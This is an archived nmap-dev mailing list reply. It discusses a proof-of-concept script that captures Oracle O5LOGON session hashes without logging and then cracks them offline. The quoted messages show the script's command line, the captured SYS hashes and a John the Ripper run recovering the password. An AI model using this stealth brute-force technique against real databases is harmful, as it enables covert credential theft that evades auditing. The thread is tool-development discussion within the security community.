Nmap Development mailing list archives
Re: Script suggestion - oracle
From: Richard Miles <richard.k.miles () googlemail com>
Date: Wed, 10 Oct 2012 09:44:36 -0500
Hi Dhiru Very nice work. I have written a NSE script for doing stealth attack against O5LOGON
protocol. This allows us to brute-force the session key(s) offline. I have verified that using this script generates no alerts or logs on the Oracle server.
It's really dangerous. Default configutarion? Audit was enabled? Result of "select os_username, username, userhost, action_name,
returncode from dba_audit_session where action_name = 'LOGON' and username = 'SYS' and returncode > 0 order by timestamp;" query is constant when this script is used.
I'm not sure if I understood. Do you believe that this query is generated because of each attempt that your script execute? How did you noticed it? It was logged in somewhere?
✗ cat ~/passdb wrongpassword ✗ ./nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL,userdb=/home/user/userdb,passdb=/home/user/passdb 192.168.2.253 --datadir .
Why do you need to setup a passdb if you should never complete the authentication? My understanding based on your explanation is that you will get the data that you need before send password, right?
Starting Nmap 6.02 ( http://nmap.org ) at 2012-10-06 13:03 IST sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3 sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3 Nmap scan report for 192.168.2.253 Host is up (0.00033s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-brute-stealth: | Accounts | No valid accounts found | Statistics |_ Performed 2 guesses in 1 seconds, average tps: 2 Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds
Why is the same account (SYS) printed two times on the output? Do you have to users called SYS on your userdb file? Also, why the scrip says that no valid account was found it you obtained two hashes? Thanks for your great work.
➜ src git:(unstable-jumbo) ✗ cat ~/hashes sys:$o5logon$E72DE5DA9067B874D759B3FDAA5FE5D64FA290E397026DF60A5B9BBD02A753CC39084572351F269886BE5EC746D9ECFC*5B624C20405D6C0FCCC3 sys:$o5logon$93DE103E471448653275625487FA6DEADD1BE91F199D4CAA1780658E1B3606FE1F9B57BA8A0CA9E451629A039ABB1DE2*5B624C20405D6C0FCCC3 ➜ src git:(unstable-jumbo) ✗ ../run/john ~/hashes Loaded 2 password hashes with 2 different salts (Oracle O5LOGON protocol [32/64]) password (sys) password (sys) guesses: 2 time: 0:00:00:00 DONE (Sat Oct 6 13:04:44 2012) c/s: 3772 trying: password Use the "--show" option to display all of the cracked passwords reliably JtR has guessed the correct password although the nmap script tried to login with incorrect password (wrongpassword)! This script is just a PoC. It needs tons of work before it can go in. Can a Nmap developer fix and commit it? -- Cheers, Dhiru
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: Script suggestion - oracle Martin Holst Swende (Oct 04)
- Re: Script suggestion - oracle David Fifield (Oct 04)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 04)
- Re: Script suggestion - oracle Richard Miles (Oct 04)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 04)
- <Possible follow-ups>
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Patrik Karlsson (Oct 06)
- Re: Script suggestion - oracle Richard Miles (Oct 10)
- Re: Script suggestion - oracle Abuse 007 (Oct 10)
- Re: Script suggestion - oracle Dhiru Kholia (Oct 06)
- Re: Script suggestion - oracle Richard Miles (Oct 10)
- Re: Script suggestion - oracle David Fifield (Oct 04)
- Re: Script suggestion - oracle Richard Miles (Oct 10)